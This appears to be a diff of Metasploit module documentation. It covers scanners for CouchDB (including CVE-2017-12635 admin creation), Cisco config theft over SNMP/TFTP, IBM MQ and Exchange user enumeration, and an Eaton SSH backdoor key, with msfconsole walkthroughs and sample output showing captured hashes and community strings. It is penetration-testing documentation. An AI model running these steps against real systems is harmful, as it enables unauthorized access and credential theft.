https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

113
documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md
View File

@ -3,7 +3,7 @@
Apache CouchDB is a nosql database server which communicates over HTTP. This module will enumerate the server and databases hosted on it.
The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https://www.1and1.com/cloud-community/learn/database/couchdb/install-and-use-couchdb-on-ubuntu-1604/):
1. `sudo apt install software-properties-common`
2. `sudo add-apt-repository ppa:couchdb/stable`
3. `sudo apt update`
@ -20,54 +20,77 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https
## Options
**serverinfo**
**SERVERINFO**
If set to true, the server info will also enumerated and set in msf's DB. Defaults to `false`
If set to `true`, the server info will also enumerated and set in msf's DB. Defaults to `false`.
**CREATEUSER**
If set to `true`, the server info will attempt to create an account in CouchDB using configured credentials (limited to CVE-2017-12635 conditions). Defaults to `false`.
## Scenarios
A run against the configuration from these docs
Dumping databases with `SERVERINFO` and `CREATEUSER` set:
```
msf5 auxiliary(scanner/afp/afp_login) > use auxiliary/scanner/couchdb/couchdb_enum
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true
verbose => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run
[+] 1.1.1.1:5984 {
"couchdb": "Welcome",
"uuid": "6f08e89795bd845efc6c2bf3d57799e5",
"version": "1.6.1",
"vendor": {
"version": "16.04",
"name": "Ubuntu"
}
```
msf5 > use auxiliary/scanner/couchdb/couchdb_enum
msf5 auxiliary(scanner/couchdb/couchdb_enum) > options
Module options (auxiliary/scanner/couchdb/couchdb_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
CREATEUSER false yes Create Administrative user
HttpPassword IJvoGDWAWzQo yes CouchDB Password
HttpUsername CQuXQnVwQAow yes CouchDB Username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
ROLES _admin yes CouchDB Roles
RPORT 5984 yes The target port (TCP)
SERVERINFO false yes Print server info
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /_all_dbs yes Path to list all the databases
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true
serverinfo => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set createuser true
createuser => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true
verbose => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > check
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
[*] 127.0.0.1:5984 - The target appears to be vulnerable.
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
[+] 127.0.0.1:5984 - User CQuXQnVwQAow created with password IJvoGDWAWzQo. Connect to http://127.0.0.1:5984/_utils/ to login.
[+] 127.0.0.1:5984 - {
"couchdb": "Welcome",
"version": "2.1.0",
"features": [
"scheduler"
],
"vendor": {
"name": "The Apache Software Foundation"
}
[*] #{peer} Enumerating Databases...
[+] 1.1.1.1:5984 Databases:
[
"_replicator",
"_users"
]
[+] 1.1.1.1:5984 File saved in: /root/.msf4/loot/20180721105522_default_1.1.1.1_couchdb.enum_888970.bin
msf5 auxiliary(scanner/couchdb/couchdb_enum) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
1.1.1.1 5984 tcp couchdb open HTTP/1.1 200 OK
Server: CouchDB/1.6.1 (Erlang OTP/18)
Date: Sat, 21 Jul 2018 14:54:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 127
Cache-Control: must-revalidate
{"couchdb":"Welcome","uuid":"6f08e89795bd845efc6c2bf3d57799e5","version":"1.6.1","vendor":{"version":"16.04","name":"Ubuntu"}}
}
[*] 127.0.0.1:5984 - Enumerating Databases...
[+] 127.0.0.1:5984 - Databases:
```
[
"_global_changes",
"_replicator",
"_users"
]
[+] 127.0.0.1:5984 - File saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb.enum_790231.bin
[+] 127.0.0.1:5984 - _global_changes saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._global__841794.bin
[+] 127.0.0.1:5984 - _replicator saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._replica_022445.bin
[+] 127.0.0.1:5984 - _users saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._users_671128.bin
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/couchdb/couchdb_enum) >
```

47
documentation/modules/auxiliary/scanner/http/cisco_device_manager.md Normal file
View File

@ -0,0 +1,47 @@
## Description
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
## Vulnerable Application
Any Cisco networking device with the HTTP inteface turned on.
## Verification Steps
1. Enable the web interface on a cisco device `ip http server`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/http/cisco_device_manager```
4. Do: ```set RHOSTS [IP]```
5. Do: ```run```
## Options
**HttpUsername**
Username to use for basic authentication. Default value is `cisco`
**HttpPassword**
Password to use for basic authentication. Default value is `cisco`
## Scenarios
### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
```
msf5 > use auxiliary/scanner/http/cisco_device_manager
msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true
vebose => true
msf5 auxiliary(scanner/http/cisco_device_manager) > run
[+] 2.2.2.2:80 Successfully authenticated to this device
[+] 2.2.2.2:80 Processing the configuration file...
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:80 SNMP Community (RO): public
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

63
documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md Normal file
View File

@ -0,0 +1,63 @@
## Microsoft IIS shortname vulnerability scanner
The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
## Vulnerable Application
Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
## Verification Steps
1. Install IIS (default installations are vulnerable)
2. Start msfconsole
3. Check:
```
msf > use auxiliary/scanner/http/iis_shortname_scanner
msf auxiliary(iis_shortname_scanner) > set 172.16.249.128
msf auxiliary(iis_shortname_scanner) > check
[+] 172.16.249.128:80 The target is vulnerable.
```
4. Scan:
```
msf auxiliary(iis_shortname_scanner) > run
[*] Scanning in progress...
[+] Directories found
http://172.16.249.128/aspnet~1
http://172.16.249.128/secret~1
[+] Files found
http://172.16.249.128/web~1.con
http://172.16.249.128/index~1.htm
http://172.16.249.128/upload~1.asp
http://172.16.249.128/upload~2.asp
[*] Auxiliary module execution completed
```
## Options
```
Module options (auxiliary/scanner/http/iis_shortname_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base path to start scanning from
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
```
## Remediation
Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
## References
* https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
* https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

46
documentation/modules/auxiliary/scanner/http/influxdb_enum.md Normal file
View File

@ -0,0 +1,46 @@
This module enumerates databases on InfluxDB using the REST API using the default authentication of root:root.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/influxdb_enum```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
```
msf5 > use auxiliary/scanner/http/influxdb_enum
msf5 auxiliary(scanner/http/influxdb_enum) > set RHOST 172.25.65.20
RHOST => 172.25.65.20
msf5 auxiliary(scanner/http/influxdb_enum) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/http/influxdb_enum) > run
[+] 172.25.65.20:8086 - Influx Version: 1.5.1
[+] 172.25.65.20:8086 - Influx DB Found:
{
"results": [
{
"statement_id": 0,
"series": [
{
"name": "databases",
"columns": [
"name"
],
"values": [
[
"_internal"
]
]
}
]
}
]
}
[+] File saved in: /Users/unix/.msf4/loot/20180423050119_default_172.25.65.20_influxdb.enum_623871.txt
[*] Auxiliary module execution completed
```

48
documentation/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.md Normal file
View File

@ -0,0 +1,48 @@
## Vulnerable Application
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
* Download and install MQ Server
* Create a new Queue Manager
* Create a new channel (without SSL)
* Run the module
## Verification Steps
Example steps in this format (is also in the PR):
1. Install IBM MQ Server 7.5, 8, or 9
2. Start msfconsole
3. Do: ```use auxiliary/scanner/misc/ibm_mq_channel_brute```
4. Do: ```set channels_file <channel_list_file>```
5. Do: ```set rhosts <target_IP>```
6. Do: ```set rport <port>```
7. Do: ```run```
Example output:
```
msf auxiliary(scanner/misc/ibm_mq_channel_brute) > run
[*] 10.1.1.144:1414 - Found channel: TEST.CHANNEL, IsEncrypted: False, IsMQI: True
[*] 10.1.1.144:1414 - Found channel: SYSTEM.ADMIN.SVRCONN, IsEncrypted: False, IsMQI: True
[+] 10.1.1.144:1414 - Channels found: ["TEST.CHANNEL", "SYSTEM.ADMIN.SVRCONN"]
[+] 10.1.1.144:1414 - Unencrypted MQI Channels found: ["TEST.CHANNEL", "SYSTEM.ADMIN.SVRCONN"]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Options
**The CHANNELS_FILE option**
This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
## Scenarios
This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.

36
documentation/modules/auxiliary/scanner/misc/ibm_mq_enum.md Normal file
View File

@ -0,0 +1,36 @@
## Vulnerable Application
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
* Download and install MQ Server
* Create a new Queue Manager
* Create a new channel (without SSL)
* Run the module
## Verification Steps
Example steps in this format (is also in the PR):
1. Install IBM MQ Server 7.5, 8, or 9
2. Start msfconsole
3. Do: ```use auxiliary/scanner/misc/ibm_mq_enum```
4. Do: ```set channel <channel_name>```
5. Do: ```set rhosts <target_IP>```
6. Do: ```set rport <port>```
7. Do: ```run```
Example output:
```
msf auxiliary(scanner/misc/ibm_mq_enum) > run
[+] 10.1.1.144: - 10.1.1.144:1414 - Queue Manager Name: TESTQM - MQ Version: 9.1.0.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Options
**The CHANNEL option**
This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
## Scenarios
This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.

53
documentation/modules/auxiliary/scanner/misc/ibm_mq_login.md Normal file
View File

@ -0,0 +1,53 @@
## Vulnerable Application
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
* Download and install MQ Server from the above link
* Create a new Queue Manager
* Create a new channel (without SSL)
* Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
* Run the module
## Verification Steps
Example steps in this format (is also in the PR):
1. Install IBM MQ Server 7.5, 8, or 9
2. Start msfconsole
3. Do: ```use auxiliary/scanner/misc/ibm_mq_login```
4. Do: ```set channel <admin_channel_name_without_ssl>```
5. Do: ```set queue_manager <queue_manager_name>```
5. Do: ```set usernames_file <list_of_usernames>```
6. Do: ```set rhosts <target_IP>```
7. Do: ```set rport <port>```
8. Do: ```run```
Example output:
```
msf auxiliary(scanner/misc/ibm_mq_login) > run
[*] 10.1.1.10:1416 - Found username: admin
[*] 10.1.1.10:1416 - Found username: test
[+] 10.1.1.10:1416 - 10.1.1.10:1416 Valid usernames found: ["admin", "test"]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Options
**The USERNAMES_FILE option**
This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
**The QUEUE_MANAGER option**
This option should contain the name of the target Queue Manager.
**The CHANNEL option**
This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
## Scenarios
This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
* ```auxiliary/scanner/misc/ibm_mq_channel_brute```
* ```auxiliary/scanner/misc/ibm_mq_enum```
After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.

59
documentation/modules/auxiliary/scanner/misc/java_jmx_scanner.md Normal file
View File

@ -0,0 +1,59 @@
The `java_jmx_scanner` module uses the `Msf::Exploit::Remote::Java::Rmi::Client` library to perform a handshake with a Java JMX MBean server. JMX MBean listens in 1099 by default, and is used to manage and monitor Java applications.
The module returns whether the target is a Java JMX MBeans server and also outputs if the server requires authentication.
## Vulnerable Application
While many implementations of JMX are available, the module was successfully tested against an Apache ActiveMQ 5.13.3 server with JMX enabled. For convenience, a docker container (`antonw/activemq-jmx`) supports JMX and can be tweaked to require authentication.
## Verification Steps
See [PR#10401](https://github.com/rapid7/metasploit-framework/pull/10401) for general information, and [this specific comment](https://github.com/rapid7/metasploit-framework/pull/10401#issuecomment-448705897) for steps to require JMX authentication in the container. In summary:
```
docker run -p 1099:1099 antonw/activemq-jmx
docker exec -u=root -it `docker ps -q` /bin/bash
# echo -e "monitorRole QED\ncontrolRole R&D" /etc/java-7-openjdk/management/jmxremote.password
# chown activemq /etc/java-7-openjdk/management/jmxremote.password
# chmod 400 /etc/java-7-openjdk/management/jmxremote.password
# sed 's/-Dcom.sun.management.jmxremote.authenticate=false/-Dcom.sun.management.jmxremote.authenticate=true/' /opt/apache-activemq-5.13.3/bin/env
docker restart `docker ps -q`
```
## Options
**Option name**
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
## Scenarios
### ActiveMQ 5.13.3
Against the above-described Docker container, the workflow looks like:
```
msf5 auxiliary(scanner/misc/java_jmx_server) > set RHOST 127.0.0.1
msf5 auxiliary(scanner/misc/java_jmx_server) > set RPORT 1099
msf5 auxiliary(scanner/misc/java_jmx_server) > run
[*] Reloading module...
[*] 127.0.0.1:1099 - Sending RMI header...
[*] 127.0.0.1:1099 - localhost:1099 Java JMX MBean authentication required
[*] 127.0.0.1:1099 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
In addition, note that `services` within the data model has been updated:
```
msf5 auxiliary(scanner/misc/java_jmx_server) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
127.0.0.1 1099 tcp java-rmi open JMX MBean server accessible
```

21
documentation/modules/auxiliary/scanner/msmail/exchange_enum.md Normal file
View File

@ -0,0 +1,21 @@
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
This module leverages all known, and even some lesser-known services exposed by default
Exchange installations to enumerate email.
Error-based user enumeration for Office 365 integrated email addresses
## Verification
- Start `msfconsole`
- `use auxiliary/scanner/msmail/exchange_enum`
- `set (`EMAIL` or `EMAIL_FILE`)`
- `run`
- `creds`
*Results should look something like below if valid users were found:*
```
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
<ip> <ip> 443/tcp (owa) chris@somecompany.com
```

42
documentation/modules/auxiliary/scanner/msmail/host_id.md Normal file
View File

@ -0,0 +1,42 @@
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
This module leverages all known, and even some lesser-known services exposed by default
Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration.
**Identify Command**
- Used for gathering information about a host that may be pointed towards an Exchange or o365 tied domain
- Queries for specific DNS records related to Office 365 integration
- Attempts to extract internal domain name for onprem instance of Exchange
- Identifies services vulnerable to time-based user enumeration for onprem Exchange
- Lists password-sprayable services exposed for onprem Exchange host
**Note:** Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed
## Verification
- Start `msfconsole`
- `use auxiliary/scanner/msmail/host_id`
- `set RHOSTS <target>`
- `run`
*Results should look like below:*
```
msf5 > use auxiliary/scanner/msmail/host_id
msf5 auxiliary(scanner/msmail/host_id) > set RHOSTS <host>
RHOSTS => <host>
msf5 auxiliary(scanner/msmail/host_id) > run
[*] Running for <ip>...
[*] Attempting to harvest internal domain:
[*] Internal Domain:
[*] <domain>
[*] [-] Domain is not using o365 resources.
[*] Identifying endpoints vulnerable to time-based enumeration:
[*] [+] https://<host>/Microsoft-Server-ActiveSync
[*] [+] https://<host>/autodiscover/autodiscover.xml
[*] [+] https://<host>/owa
[*] Identifying exposed Exchange endpoints for potential spraying:
[*] [+] https://<host>/oab
[*] [+] https://<host>/ews
```

25
documentation/modules/auxiliary/scanner/msmail/onprem_enum.md Normal file
View File

@ -0,0 +1,25 @@
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
This module leverages all known, and even some lesser-known services exposed by default
Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration.
- Error-based user enumeration for on premise Exchange services
**Note:** Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed
## Verification
- Start `msfconsole`
- `use auxiliary/scanner/msmail/onprem_enum`
- `set RHOSTS <target>`
- `set (`USER` or `USER_FILE`)
- `run`
- `creds`
*Results should look something like below if valid users were found:*
```
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
10.1.1.1 10.1.1.1 443/tcp (owa)
10.1.1.1 10.1.1.1 443/tcp (owa) chris
```

47
documentation/modules/auxiliary/scanner/sip/options_tcp.md Normal file
View File

@ -0,0 +1,47 @@
## Vulnerable Application
SIP is a signaling protocol for voice, and video typically associated with VOIP and typically used in commercial
phone systems. SIP and VOIP are gaining popularity with home and cellular voice/video calling systems as well.
This module scans the TCP port to identify what OPTIONS are available on the SIP service.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/scanner/sip/options_tcp```
3. Do: ```set rhosts [ip]```
4. Do: ```run```
## Scenarios
### Cisco UC520
```
msf5 > use auxiliary/scanner/sip/options_tcp
msf5 auxiliary(scanner/sip/options_tcp) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/sip/options_tcp) > run
[*] 2.2.2.2:5060 - 2.2.2.2:5060 tcp SIP/2.0 200 OK: {"Server"=>"Cisco-SIPGateway/IOS-12.x", "Allow"=>"INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER"}
[*] 2.2.2.2:5060 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming using NMAP
Utilizing the [sip-methods](https://nmap.org/nsedoc/scripts/sip-methods.html) script
```
nmap --script=sip-methods -p 5060 2.2.2.2
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-11 15:44 EDT
Nmap scan report for 2.2.2.2
Host is up (0.0036s latency).
PORT STATE SERVICE
5060/tcp open sip
|_sip-methods: INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER
MAC Address: 00:1B:8F:AA:AA:AA (Cisco Systems)
```

143
documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md Normal file
View File

@ -0,0 +1,143 @@
## Vulnerable Application
Cisco IOS devices can be configured to back-up their running and startup configurations via SNMP.
This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
feature of IOS and many other networking devices, and is part of an administrator functionality.
A read-write community string is required, as well as a tftp server (metasploit includes one).
After the config has been copied, the SNMP paramters are deleted.
## Verification Steps
1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/snmp/cisco_config_tftp```
4. Do: ```set COMMUNITY [read-write snmp]```
5. Do: ```set rhosts [ip]```
6. Do: ```run```
## Options
**COMMUNITY**
The SNMP community string to use which must be read-write. Default is `public`.
## Scenarios
### Cisco UC520-8U-4FXO-K9 running IOS 12.4
```
msf5 > setg rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 > use auxiliary/scanner/snmp/cisco_config_tftp
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set community private
community => private
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run
[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 2.2.2.2...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 2.2.2.2 - 2.2.2.2.txt 22831 bytes
[+] 2.2.2.2:161 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:161 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:161 SNMP Community (RO): public
[+] 2.2.2.2:161 SNMP Community (RW): private
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
```
### Manual Interaction
This process can also be executed manually utilizing Metasploit's TFTP server.
Cisco's [documentation](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
was utilized to create this process.
1. Start the TFTP server
```
msf5 > use auxiliary/server/tftp
msf5 auxiliary(server/tftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/tftp) >
[*] Starting TFTP server on 0.0.0.0:69...
[*] Files will be served from /tmp
[*] Uploaded files will be saved in /tmp
```
2. Execute the SNMP commands. An integer is required to group the requests together, `666` is used in this example.
```
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
iso.3.6.1.4.1.9.9.96.1.1.1.1.2.666 = INTEGER: 1
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4
iso.3.6.1.4.1.9.9.96.1.1.1.1.3.666 = INTEGER: 4
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1
iso.3.6.1.4.1.9.9.96.1.1.1.1.4.666 = INTEGER: 1
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1"
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1"
iso.3.6.1.4.1.9.9.96.1.1.1.1.5.666 = IpAddress: 1.1.1.1
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config"
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config"
iso.3.6.1.4.1.9.9.96.1.1.1.1.6.666 = STRING: "backup_config"
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1
iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1
```
3. At this point the config is transferring, we need to wait a few seconds. Lastly, we'll remove `666` from the system.
```
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6
iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 6
```
4. Confirm we have our config file
```
msf5 auxiliary(server/tftp) > ls -lah /tmp/backup_config
[*] exec: ls -lah /tmp/backup_config
-rw-r--r-- 1 root root 23K Oct 11 22:20 /tmp/backup_config
```
## Confirming using NMAP
Utilizing the [snmp-ios-config](https://nmap.org/nsedoc/scripts/snmp-ios-config.html) script
```
nmap -sU -p 161 --script snmp-ios-config --script-args creds.snmp=:private 192.168.2.239
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-11 22:30 EDT
Nmap scan report for 192.168.2.239
Host is up (0.0034s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-ios-config:
| !
| ! Last configuration change at 18:01:46 PST Fri Jan 7 2000 by cisco
| ! NVRAM config last updated at 06:07:55 PST Tue Jan 4 2000 by cisco
| !
| version 12.4
| parser config cache interface
| no service pad
| service timestamps debug datetime msec
| service timestamps log datetime msec
| no service password-encryption
| service internal
| service compress-config
| service sequence-numbers
| !
| hostname UC520
...sip...
```

49
documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md Normal file
View File

@ -0,0 +1,49 @@
## Vulnerable Application
Cisco IOS devices can be configured to retrieve, via tftp, a file via SNMP.
This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
feature of IOS and many other networking devices, and is part of an administrator functionality.
A read-write community string is required, as well as a tftp server (metasploit includes one).
The file will be saved to `flash:`.
## Verification Steps
1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
4. Do: ```set COMMUNITY [read-write snmp]```
5. Do: ```set rhosts [ip]```
6. Do: ```set source [file]```
7. Do: ```run```
## Options
**COMMUNITY**
The SNMP community string to use which must be read-write. Default is `public`.
**SOURCE**
The location of the source file to be uploaded to the Cisco device.
## Scenarios
### Cisco UC520-8U-4FXO-K9 running IOS 12.4
```
msf5 > setg rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 > use auxiliary/scanner/snmp/cisco_upload_file
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /tmp/backup_config2
source => /tmp/backup_config2
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set community private
community => private
msf5 auxiliary(scanner/snmp/cisco_upload_file) > run
[*] Starting TFTP server...
[*] Copying file backup_config2 to 2.2.2.2...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
```

39
documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md Normal file
View File

@ -0,0 +1,39 @@
# Description
The `eaton_xpert_backdoor` module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.
## Vulnerable Application
Eaton is a power management company with a wide range of power management products.
Power meters sold by Eaton used a firmware build process for many years that left a developer key pair in the default profile.
Specific models include: Power Xpert Meter 4000/6000/8000
[Software Link](http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2)
Vulnerable Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
Tested on: Firmware 12.1.9.1 and 13.3.2.10
Similar to running: `ssh -m hmac-sha1 -c aes128-cbc -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -i ./id_rsa admin@1.1.1.2`
## Verification Steps
1. Start `msfconsole`
2. `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
3. `set RHOSTS 1.1.1.2`
4. `run -z`
5. Vulnerable hosts should present a shell
## Scenarios
```
msf > use auxiliary/scanner/ssh/eaton_xpert_backdoor
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > set RHOSTS 1.1.1.2
RHOSTS => 1.1.1.2
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > run -z
[+] 1.1.1.2:22 - Logged in as admin
[*] Command shell session 1 opened (1.1.1.1:62063 -> 1.1.1.2:22) at 2018-08-31 19:12:21 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

167
documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md Normal file
View File

@ -0,0 +1,167 @@
## Intro
